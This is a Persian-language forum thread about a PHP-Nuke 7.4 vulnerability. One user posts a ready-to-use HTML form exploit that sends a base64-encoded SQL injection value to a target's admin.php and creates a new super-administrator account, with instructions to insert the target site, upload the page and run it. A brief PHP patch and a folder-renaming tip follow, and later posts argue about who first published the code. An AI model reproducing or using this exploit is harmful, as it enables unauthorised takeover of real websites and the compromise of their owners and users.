حالت موضوعی | حالت خطی

4shir

سلام يك كد جالب اومده براي ناك كه تركونده توي سايت بخاطر امنيت سايت نميزارم اگر اشكان گفت ميزارم اشكان حواست باشه سايت پتچ شه :wink:

**ashkan**

بزارش فوقش سايت رو ميتركونن(شوخي بزارش تا منم سريع ببينم چطور ميشه جلوش رو گرفت)

4shir

خوب راه محافظتش كه تغير دادن نام پوشه ادمين هستش كد ها هم اينجا ميزارم

کد: 
<html> 

<head> 

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> 

</head> 

<body> 

<form name="mantra" method="POST" action="http://www.target.com/admin.php"> 

<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> 

<input type="hidden" name="add_radminsuper" value="1"> 

<input type="hidden" name="op" value="AddAuthor"> 

<p>USERNAME: 

<input type="text" name="add_aid" size="20"> 

<br> 

NAME: 

<input type="text" name="add_name" size="20"> 

<br> 

PASSWORD: 

<input type="text" name="add_pwd" size="20"> 

<br> 

E-MAIL: 

<input type="text" name="add_email" size="20"> 

</p> 

<p> 

<input type="submit" name="Submit" value="Create Admin"> 

<br> 

</p> 

</form> 

</body> 

</html>

اينها رو بايد بزاريد توي يك صفحه هتمل بعد به جا target اسم سايت مورد نظر رو بدين و بعدش اپلود كنيد توي هاست و بعد هم اجراش كنيد

يك راه پتچ ديگه كه الان توي اشيانه ديدم اين هست

کد: 
if ( !empty($HTTP_GET_VARS['op']) ) {

$op = $HTTP_GET_VARS['op'];

}

if ( !empty($HTTP_POST_VARS['op']) ) {

$op = $HTTP_POST_VARS['op'];

}

منبع هم اشيانه

**ashkan**

اوه از زماني كه آقاساسان اينو اينجا زدي تعداد بازديدكننده ها شده 109 نفر 8O كه حتما 40 ٪ براي هك كردن سايت آومدن برم زود جلو پلاس سايت رو جمع كنم تا هك نشده. :cry:

**ashkan**

اينم شاهد :
[تصویر: 109.JPG]

mehrad-a

دوست عزيز شما بر خلاف Tos آشيانه عمل كرده و اطلاعات آشيانه را پخش كرده ايد.

**amirjan**

mehrad-a نوشته است:دوست عزيز شما بر خلاف Tos آشيانه عمل كرده و اطلاعات آشيانه را پخش كرده ايد.

قضيه چيه ؟؟ :?: :?: TOS ؟؟؟؟ :?: :?:

4shir

خوب اول اشكان
اشكان جان من كه گفتم اين رو نميزارم خودنت خواستي :o :wink: بعدش هم راه پتچ هم گفتم كه مشكلي برات پيش نياد اين از اين
دوم شما مهراد جان درست هستش كه اشيانه به اين صورت عمل ميكنه اما من اين مطلب رو از اونجا بر نداشتم :wink: بلكه پتچ رو از اونجا برداشتم اگر خواستيد بدونيد كي اين رو برداشته از اونجا و به نام خودش ثبت كرده به من بگيد تا بدم بهتون حتي Amaze

بالاي فايل ميتونيد اين رو بخونيد copyright by laphasecurityteam گفتم ازكجا هم برداشتم Amaze

عيب نداره در هر صورت اميدوارم كسي از اين مسيله سوء استفاده نكنه
موفق باشيد
ساسان

**ashkan**

mehrad-a نوشته است:دوست عزيز شما بر خلاف Tos آشيانه عمل كرده و اطلاعات آشيانه را پخش كرده ايد.

خوب پس اين آشيانه اي ها هم اينجا هستن ، اوه پس يكم بايد مواظب بود ، قبلا كه هكشو با نابود كامل سايت ديگران همراه بود حالا نميدونم؟

saadatmandi

اين كدهايي رو كه شما نوشتيد همش رو سايتي به نام http://www.mantralab.org انتشار داده.
بعضي دودره بازها هم به اسم خودشون مي زنن .. Amaze

**amirjan**

اه راست ميگه ها !! اينجا هم هست ! :
ايناها --> http://www.mantralab.org/modules.php/mod...wAdmin+Bug

حالت موضوعی \| حالت خطی هشدار در مورد phpnuke7.4
نویسنده	پیام